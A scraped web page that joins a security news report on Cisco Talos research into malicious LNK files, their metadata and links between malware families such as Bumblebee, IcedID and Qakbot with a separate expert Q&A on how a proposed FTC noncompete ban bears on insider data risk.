Cybercriminals are increasingly leveraging malicious LNK files as an initial access method to download and execute payloads such as Bumblebee, IcedID, and Qakbot.

A recent study by cybersecurity experts has shown that it is possible to identify relationships between different threat actors by analyzing the metadata of malicious LNK files, uncovering information such as the specific tools and techniques used by different groups of cybercriminals, as well as potential links between seemingly unrelated attacks.

"With the increasing usage of LNK files in attack chains, it's logical that threat actors have started developing and using tools to create such files," Cisco Talos researcher Guilherme Venere said in a report shared with The Hacker News.

This includes tools like NativeOne's mLNK Builder and Quantum Builder, which allow subscribers to generate rogue shortcut files and evade security solutions.

Some of the major malware families that have used LNK files for initial access include Bumblebee, IcedID, and Qakbot, with Talos identifying connections between Bumblebee and IcedID as well as Bumblebee and Qakbot by examining the artifacts' metadata.

Specifically, multiple samples of LNK files leading to IcedID and Qakbot infections and those that were used in different Bumblebee campaigns have all been found to share the same Drive Serial Number.

LNK files have also been employed by advanced persistent threat (APT) groups like Gamaredon (aka Armageddon) in its attacks aimed at Ukrainian government entities.

The noticeable spike in campaigns using malicious shortcuts is seen as a reactive response to Microsoft's decision to disable macros by default in Office documents downloaded from the Internet, prompting threat actors to embrace alternative attachment types and delivery mechanisms to distribute malware.

Recent analyses from Talos and Trustwave have disclosed how APT actors and commodity malware families alike are weaponizing Excel add-in (XLL) files and Publisher macros to drop remote access trojans on compromised machines.

What's more, threat actors have been observed taking advantage of rogue Google Ads and search engine optimization (SEO) poisoning to push off-the-shelf malware like BATLOADER, IcedID, Rhadamanthys Stealer, and Vidar to victims searching for a slew of legitimate software.

BATLOADER, associated with an intrusion set tracked by Trend Micro as Water Minyades, is an "evasive and evolutionary malware" that's capable of installing additional malware, including Cobalt Strike, Qakbot, Raccoon Stealer, RedLine Stealer, SmokeLoader, Vidar, and ZLoader.

"Attackers are imitating the websites of popular software projects to trick victims into infecting their computers and buying search engine adverts to drive traffic there," HP Wolf Security researcher Patrick Schläpfer said.

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

New Research Delves into the World of Malicious LNK Files and Hackers Behind Them

Without noncompetes, how do organizations make sure employees aren't taking intellectual property when they go work to work for a competitor?

**Question: How would the FTC rule on noncompetes affect data security?**

**Jadee Hanson, CIO and CISO, Code42:** The Federal Trade Commission's proposed rule grants employees well-deserved autonomy regarding where they work, and when. However, it also complicates the relationship between employer and employee when it comes to data ownership, and security teams need to be aware that, if passed, their employees could easily leave their company for a competitor, with sensitive data and intellectual property (IP) in tow.

One reason noncompetes exist is to keep company data and intellectual property from leaking to competitors. It's easy to verify when a former employee takes a new position with a competitor, but not so easy to know if that employee took company data with them. I would argue that companies should not be relying solely on noncompete agreements to keep their valuable IP safe — but their potential ban makes it even more important to have the proper data security in place.

Organizations should incorporate technologies and processes that can identify risky file movements without inhibiting the organization's collaborative culture and employee productivity. They need technology that can see movement across a variety of cloud applications, automate security alerts, and prioritize insider risk concerns. Today, data is highly portable, and users are doing their jobs off the company network — greatly decreasing security's visibility into file movements. Potential risk indicators could include file movements made while users are off-hours, changing file extensions, or having access to the files of a highly confidential project. Without technology providing the right visibility, it's nearly impossible for security to focus on the right protections and mitigate the overall data exposure risk.

There's an assortment of tools that business leaders can choose from, but the most effective data protection technology can tell the difference between trusted and untrusted locations and allows employees to openly collaborate. In particular, insider risk management tools allow you to monitor, filter, and prioritize risk events, detecting when files are moving to noncorporate locations, including personal devices and cloud storage solutions.

This being said, it's not solely about the tools. Security and HR teams should also be sure to define formal onboarding and offboarding policies for employees, proper data handling training, and processes to address insider risks as they are found. A good security culture starts with a security team that is willing to empower the entire organization to get its job done. Using a "trust but verify" approach allows leaders to facilitate positive, trusting relationships with employees, using monitoring tools to ensure they're only intervening when it's absolutely necessary. The way organizations manage the relationship between their security teams and the broader employee and user base has decisive effects on retention and the overall employee experience. If security, legal, and HR teams approach insider risk events in the same combative, and sometimes hostile, manner they do external threats, it can increase tension between themselves and the rest of the organization, sowing the seeds for a culture of distrust among employees.

At the end of the day, it's on every employee in the workforce to do their part in keeping the company secure, and creating a security-aware culture from the get-go is a great way to create this vigilance.

By embodying a security-focused attitude and having a holistic data protection program in place internally, security leaders can have peace of mind knowing that they're maintaining a positive work environment for their teams while also feeling confident that important competitive data is not leaving with employees.

Tag

#intel